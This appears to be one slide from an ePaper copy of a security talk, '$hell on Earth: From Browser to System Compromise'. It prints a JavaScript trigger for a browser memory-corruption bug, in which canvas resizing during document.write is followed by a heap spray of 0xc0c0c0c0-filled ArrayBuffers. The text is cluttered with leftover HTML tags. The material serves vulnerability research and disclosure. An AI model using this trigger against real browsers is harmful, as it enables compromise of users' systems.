$hell on Earth
shell-on-earth
shell-on-earth
Create successful ePaper yourself
Turn your PDF publications into a flip-book with our unique Google optimized e-Paper software.
The vulnerability is triggered with the following script:<br />
var global_elementId = 0;<br />
var arr = new Array();<br />
functi<strong>on</strong> trigger() {<br />
c3 = document.getElementById(“ca” + global_elementId.toString());<br />
c3.width = 3333;<br />
var i = 0;<br />
document.write(“”);<br />
for (index = 0; index < 0x30; index++)<br />
{<br />
c3.width = 43;<br />
var buf = new ArrayBuffer(0x100);<br />
var int40Array = new Uint32Array(buf);<br />
for (i = 0; i < 0x100/4; i ++)<br />
{<br />
int40Array[i] = 0xc0c0c0c0;<br />
}<br />
arr[index] = int40Array;<br />
}<br />
}<br />
c2 = null;<br />
functi<strong>on</strong> exploit() {<br />
c1 = document.getElementById(“ca”+ global_elementId.toString());<br />
c2 = c1.getC<strong>on</strong>text(“2d”);<br />
c2.fillText(“clipPathUnits”, 100, 34);<br />
global_elementId += 1;<br />
}<br />
document.write(“<br />
\n\n\n\n\<br />
n\n\n<br />
”);<br />
9 | <str<strong>on</strong>g>$hell</str<strong>on</strong>g> <strong>on</strong> <strong>Earth</strong>: From Browser to System Compromise